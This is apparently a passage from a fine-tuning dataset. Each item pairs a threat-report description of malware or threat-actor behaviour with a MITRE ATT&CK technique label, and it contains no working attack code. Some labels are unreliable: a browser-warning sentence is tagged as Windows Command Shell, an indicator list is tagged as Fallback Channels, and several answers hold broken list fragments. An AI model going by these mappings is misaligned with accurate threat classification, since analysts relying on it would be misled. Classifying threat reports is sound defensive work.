- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cardinal RAT is deployed using an interesting technique of compiling and executing a downloader via a malicious macro embedded within a Microsoft Excel file. The Excel files themselves contain lures that have financial themes. This threat has had a low volume of samples in the past two years, with 11 instances of Carp Downloader and 27 instances of Cardinal RAT observed"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkComet has a keylogging capability."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BackConfig has used a custom routine to decrypt strings."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HermeticWiper has the ability to corrupt disk partitions and obtain raw disk access to destroy data."
- },
- {
- "role": "assistant",
- "content": "T1561.001 - Disk Content Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "saves itself with a leading \".\" so that it's hidden from users by default."
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To establish persistence, adds a Registry Run key with a value \"TaskMgr\" in an attempt to masquerade as the legitimate Windows Task Manager."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoshC2 contains an implementation of netstat to enumerate TCP and UDP connections."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Registry traversal for Putty data exfiltration (left), code showing hostname, username and Private Key Files (right"
- },
- {
- "role": "assistant",
- "content": "T1552.002 - Unsecured Credentials: Credentials in Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LightNeuron collects Exchange emails matching rules specified in its configuration."
- },
- {
- "role": "assistant",
- "content": "T1114.002 - Email Collection: Remote Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PLATINUM has used various methods of process injection including hot patching."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Magic Hound campaign used Word and Excel documents containing malicious macros as a delivery method, specifically attempting to load either the Pupy RAT or meterpreter which we have called MagicHound.Rollover. The malicious macros were all designed to use Windows PowerShell to download a shellcode-based payload from a remote server. We discovered two different techniques used in the PowerShell scripts, the first being a straightforward execute command of a string retrieved from the remote server. The second technique appeared to be from a tool called Magic Unicorn, an open source module for meterpreter. Specifically, we discovered code in the PowerShell script that was a match for code in Magic Unicorn containing the comment “one line shellcode injection with native x86 shellcode"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BRONZE BUTLER has used at to register a scheduled task to execute malware during lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1053.002 - Scheduled Task/Job: At"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BBSRAT uses GET and POST requests over HTTP or HTTPS for command and control to obtain commands and send ZLIB compressed data back to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In the period between January and March 2017 the TeleBots attackers compromised a software company in Ukraine (not related to M.E. Doc), and, using VPN tunnels from there, gained access to the internal networks of several financial institutions"
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FunnyDream can identify the processes for Bkav antivirus."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Through manual reverse engineering, we were able to extract the main malicious Python modules from the Xbash executables and decompile them successfully. Therefore, in the later sections of this analysis, we show the Python source code."
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This turned out to be the best solution, as the Cobalt group set up a controlled botnet in the bank's network which was very difficult to track and even harder to stop. Initially the Cobalt group focused on jackpotting ATMs: they launched a program that sent commands directly to the dispenser to issue cash. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. The goal is to set the startup path to the executable file or program code, launching it with the powershell.exe shell command to access the Internet resource specified in the code in order to download and install Cobalt Strike module. From our experience, the Cobalt group uses a new method to provide its survivability in every attack. The Cobalt Strike module can use several profiles and switch between data exchange methods on command from the C&C server without the need to update the module. Use of standard tools Cobalt Strike is publicly accessible, and can be downloaded in order to learn and create detection rules on the network. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWERSTATS has created a scheduled task named \"MicrosoftEdge\" to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has used several malicious applications that abused OAuth access tokens to gain access to target email accounts, including Gmail and Yahoo Mail."
- },
- {
- "role": "assistant",
- "content": "T1550.001 - Application Access Token"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "4 Upload edg499.dat, which includes the list of interesting files"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After collecting files and logs from the victim, encrypts some collected data with Blowfish."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Process Explorer, Process Monitor and PCHunter have been utilized to discover any anti-malware or monitoring software and terminate it."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery', 'T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrailBlazer has used filenames that match the name of the compromised system in attempt to avoid detection."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An older variant of PLAINTEE performs UAC bypass."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Uses PowerShell to retrieve the malicious payload and download additional resources such as Mimikatz and Rclone."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "You are using Microsoft Internet Explorer. We recommend using Chrome or Firefox for the best experience"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If the user clicks on the link, he will be prompted to download a RAR file that contains the stage 1 malware/lure, which he will execute afterwards"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Enumerate all CLRs loaded in the AD FS process Microsoft.IdentityServer.ServiceHost.exe - For each CLR, enumerate all running application domains and perform the following actions for each domain: Read the contents of the following encrypted FoggyWeb backdoor file into memory: C:\\Windows\\SystemResources\\Windows.Data.TimeZones\\pris\\Windows.Data.TimeZones.zh-PH.pri Decrypt the encrypted FoggyWeb backdoor file using the Lightweight Encryption Algorithm (LEA). The LEA-128 key schedule uses the following hardcoded master key to generate the round keys: - Read the contents of the following encrypted FoggyWeb backdoor file into memory: C:\\Windows\\SystemResources\\Windows.Data.TimeZones\\pris\\Windows.Data.TimeZones.zh-PH.pri - Decrypt the encrypted FoggyWeb backdoor file using the Lightweight Encryption Algorithm (LEA). The LEA-128 key schedule uses the following hardcoded master key to generate the round keys"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "While Diavol is not packed nor has any anti-disassembly tricks, it does use an interesting anti-analysis technique to obfuscate its code. Its main routines are kept in bitmap images, which are stored in the PE resource section. Before calling each routine, it copies the bytes from the bitmap to a global buffer that has execute permissions"
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API', 'T1027.003 - Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses HTTP for communication to the control servers."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains a command to download and execute a file from a remotely hosted URL using WinINet HTTP requests."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chrommme has the ability to capture screenshots."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remexi developers use the C programming language and GCC compiler on Windows in the MinGW environment. The malware utilizes several persistence mechanisms including scheduled tasks, Userinit and Run registry keys in the HKLM hive"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BoomBox has the ability to download next stage malware components to a compromised system."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HARDRAIN opens the Windows Firewall to modify incoming connections."
- },
- {
- "role": "assistant",
- "content": "T1562.004 - Impair Defenses: Disable or Modify System Firewall"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Via WMI (winmgmt), the JavaScript or VBscript code in the SCT file spawns a PowerShell one-liner which finally consumes the text file"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BitPaymer compares file names and paths to a list of excluded names and directory names during encryption."
- },
- {
- "role": "assistant",
- "content": "T1480 - Execution Guardrails"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KGH_SPY has the ability to steal data from the Chrome, Edge, Firefox, Thunderbird, and Opera browsers."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ke3chang has used the right-to-left override character in spearphishing attachment names to trick targets into executing .scr and .exe files."
- },
- {
- "role": "assistant",
- "content": "T1036.002 - Right-to-Left Override"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "includes garbage code to mislead anti-malware software and researchers."
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "xCaon has a command to start an interactive shell."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AuditCred can search through folders and files on the system."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Intelligence gathering and stealing information has generally been the motivation behind Cicada’s attacks in the past, and that would appear to be the case in this attack campaign too. We observed the attackers archiving some folders of interest in these attacks, including in one organization folders relating to human resources (HR), audit and expense data, and meeting memos"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is known to contain functionality that enables targeting of smart card technologies to proxy authentication for connections to restricted network resources using detected hardware tokens."
- },
- {
- "role": "assistant",
- "content": "T1111 - Multi-Factor Authentication Interception"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Seth-Locker has the ability to download and execute files on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Trojan will convert these hexadecimal bytes to their binary values and write them to a file and will run the file using the “open” function using the ShellExecuteW API function"
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API', 'T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has collected data of interest from network shares."
- },
- {
- "role": "assistant",
- "content": "T1039 - Data from Network Shared Drive"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Expand can be used to download or upload a file over a network share."
- },
- {
- "role": "assistant",
- "content": "T1570 - Lateral Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In the instances we have observed, the threat actor sent spear-phishing emails, luring the victims to open a malicious Microsoft Excel/Word document. The Word droppers were using standard VBA macros to download the payload. The actor tailored the decoy contents to the targeted victims, using logos and themes relevant to the targeted company or using trending topics from their region and, in one instance, even mimicking the Palestinian authority"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery', 'T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A variant of Zebrocy captures screenshots of the victim’s machine in JPEG and BMP format."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to capture keystrokes."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BLINDINGCAN has lured victims into executing malicious macros embedded within Microsoft Office documents."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Group has used DNS tunneling for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Honeybee, the threat actors deployed malware that used API calls, including `CreateProcessAsUser`."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ChromeUpdate.exe starts the file with “rundll32 cache.dll,ADB_Setup” Cache.dll analysis Cache.dll was written in C/C++ and built with a Microsoft compiler"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection', 'T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These redirects were implemented by adding two malicious scripts obfuscated by a tool similar to the Dean Edwards packer"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Anchor can use secondary C2 servers for communication after establishing connectivity and relaying victim information to primary C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Indicators of Compromise (IoCs) C&C servers Ssl[.]arkouthrie[.]com s3[.]hiahornber[.]com widget[.]shoreoa[.]com SHA256 Delivery document (W2KM_OCEANLOTUS.A): 2bb855dc5d845eb5f2466d7186f150c172da737bfd9c7f6bc1804e0b8d20f22a Dropper (OSX_OCEANLOTUS.D): 4da8365241c6b028a13b82d852c4f0155eb3d902782c6a538ac007a44a7d61b4 Backdoor (OSX_OCEANLOTUS.D): 673ee7a57ba3c5a2384aeb17a66058e59f0a4d0cddc4f01fe32f369f6a845c8f The post New MacOS Backdoor Linked to OceanLotus Found appeared first on"
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "adds a Registry Run key for ctfmon.exe to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stuxnet propagates using the MS10-061 Print Spooler and MS08-067 Windows Server Service vulnerabilities."
- },
- {
- "role": "assistant",
- "content": "T1210 - Exploitation of Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Talos has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat actor MuddyWater. MuddyWater has been active since at least November 2017 and has been known to primarily target entities in the Middle East. The \"Blackwater.bas\" macro was obfuscated using a substitution cipher whereby the characters are replaced with their corresponding integer. The clear text version of the crf.txt file closely resembled the PowerShell agent that was previously used by the MuddyWater actors when they targeted Kurdish political groups and organizations in Turkey. The actors have made some small changes, such as altering the variable names to avoid Yara detection and sending the results of the commands to the C2 in the URL instead of writing them to file. Notably, a number of the PowerShell commands used to enumerate the host appear to be derived from a GitHub projected called FruityC2. Most of the PowerShell commands would call Windows Management Instrumentation (WMI) and then query the following information"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of listing contents of folders on the victim. also searches for custom network encryption software on victims."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TEARDROP ran as a Windows service from the \"c:\\windows\\syswow64\" folder."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In the old campaign the actor used TextBoxes to store its data while in the new one the content has been base64 encoded within the document content. In the new campaign JavaScript files have been used to execute batch and PowerShell files. The new campaign uses Powershell and URLMON API calls to download the cab file while in the old campaign it used certutil to download the cab file. The new campaign has used two different UAC bypass techniques based on the victim’s OS while in the old one the actor only used the Token Impersonation technique. In the new campaign the actor has developed a new variant of Konni RAT that is heavily obfuscated"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BACKSPACE attempts to avoid detection by checking a first stage command and control server to determine if it should connect to the second stage server, which performs \"louder\" interactions with the malware."
- },
- {
- "role": "assistant",
- "content": "T1104 - Multi-Stage Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has deployed malware designed not to run on computers set to Korean, Japanese, or Chinese in Windows language preferences."
- },
- {
- "role": "assistant",
- "content": "T1614.001 - System Location Discovery: System Language Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UBoatRAT encrypts instructions in the payload using a simple XOR cipher."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
